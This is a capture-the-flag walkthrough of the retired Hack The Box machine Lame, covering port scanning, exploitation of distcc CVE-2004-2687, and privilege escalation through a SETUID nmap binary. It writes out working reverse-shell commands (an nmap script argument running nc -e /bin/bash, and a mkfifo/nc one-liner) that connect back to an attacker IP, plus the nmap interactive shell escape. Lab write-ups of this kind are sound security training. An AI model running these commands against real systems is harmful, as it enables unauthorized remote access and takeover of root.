Lame

CTFHackTheBox

About Lame

Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Enumeration

rustscan

One tool that aids in port scanning is rustscan. Let’s consider an example where we want to scan the IP address 10.10.10.3. The command we use is:

1
rustscan -a 10.10.10.3

The -a flag signifies scanning all 65,535 ports on the IP address

Upon executing the command, we receive an output that lists open ports and their corresponding numbers on the target system:

1
2
3
4
5
Open 10.10.10.3:21
Open 10.10.10.3:22
Open 10.10.10.3:139
Open 10.10.10.3:3632
Open 10.10.10.3:445

Each line represents an open port and its associated service:

  • Port 21: Commonly used for FTP, facilitating file transfers.
  • Port 22: Typically employed for SSH, enabling secure remote access.
  • Port 139: Linked to NetBIOS Session Service for Windows file and printer sharing.
  • Port 3632: Possibly related to Distributed Compiler Daemon (distcc) communication.
  • Port 445: Used for Microsoft-DS (Directory Services) and Windows file sharing.

nmap

To take a step further and understand the services behind these ports, we turn to Nmap, a versatile network scanning tool. Here’s the command we use:

1
nmap 10.10.10.3 -A -p 21,22,139,3632,445 -Pn
  • -A: The -A flag enables aggressive scanning, including OS detection, version detection, script scanning, and traceroute.
  • -p 21,22,139,3632,445: The -p flag specifies the ports we want to examine.
  • -Pn: The -Pn flag tells Nmap not to perform host discovery; we assume the host is online.

When we execute the command, Nmap provides a wealth of information about the target system’s open ports, services, and more:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 13:19 CEST
Nmap scan report for 10.10.10.3
Host is up (0.023s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.14
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open              Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m21s, deviation: 2h49m45s, median: 19s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-07-13T07:19:58-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.56 seconds

The ftp server with anonymous is empty.
let’s search what is distccd on the port 3632.

User

https://book.hacktricks.xyz/network-services-pentesting/3632-pentesting-distcc

Exploiting Vulnerabilities: distcc CVE-2004-2687

Let’s start by exploring how the Netcat (nc) tool can be used to establish connections between systems. The command we’ll use is:

1
nc -lnvp 4444

This command listens for incoming connections on port 4444. It’s commonly used to establish reverse shell connections, which can be a vital component of penetration testing and security research.

For this demonstration, we’ll focus on the distcc service and a known vulnerability, CVE-2004-2687. The command to exploit this vulnerability is:

1
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.14 4444 -e /bin/bash'"
  • -p 3632: Specifies the port to target.
  • --script distcc-cve2004-2687: Instructs Nmap to use the distcc-cve2004-2687 script.
  • --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.14 4444 -e /bin/bash'": Provides arguments to the script, in this case, a command to execute.

Upgrade the shell

Enhancing Usability: Optimal Reverse Shell

To upgrade the shell, we start by creating an improved connection point. Using Netcat (nc), we initiate a listener:

1
nc -lnvp 4949

Next, we explore an optimized method to create a reverse shell that ensures better interactivity and ease of use. The command we’ll employ is:

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.14 4949 >/tmp/f

Breaking down the command:

  • rm /tmp/f: Deletes any existing named pipe.
  • mkfifo /tmp/f: Creates a named pipe.
  • cat /tmp/f|sh -i 2>&1: Redirects the content of the named pipe into a shell.
  • nc 10.10.14.14 4949 >/tmp/f: Connects the shell to the listening Netcat instance.

Enhancing Interaction and Usability

Additionally, we have techniques to improve the user experience while interacting with the compromised system:

  • python -c 'import pty;pty.spawn("/bin/bash")': Initiates an interactive shell using Python’s pty module, which provides better terminal emulation.
  • export TERM=xterm: Sets the terminal type to allow commands like clear to function correctly.
  • ctrl+z: Suspends the shell.
  • stty raw -echo; fg: Enhances shell usability by enabling auto-completion and line editing.

Root

Linux Smart Enumeration, often abbreviated as lse.sh, is a script written in Bash that facilitates the assessment of Linux-based systems. It serves as a robust tool for identifying system information, potential vulnerabilities, and security misconfigurations. lse.sh aims to provide an all-inclusive view of the system’s security posture.

SETUID Vulnerabilities

SETUID (Set User ID) is a permission bit in Unix-like operating systems that allows users to execute a specific program with the privileges of the program’s owner, often root. A SETUID vulnerability arises when a program with elevated privileges contains flaws that can be exploited by attackers to gain unauthorized access or escalate privileges.

You can use this vulnerability to escalate privileges, gtfobin is a great tool to find how to exploit them.
https://gtfobins.github.io/gtfobins/nmap/

Nmap, renowned for its port scanning capabilities, also boasts an interactive mode that allows users to execute shell commands directly. The command to enter interactive mode is:

1
nmap --interactive

Once inside Nmap’s interactive mode, an unexpected avenue to privilege escalation emerges. By executing a shell escape command, you can effectively break out of Nmap and gain access to a system shell:

1
!sh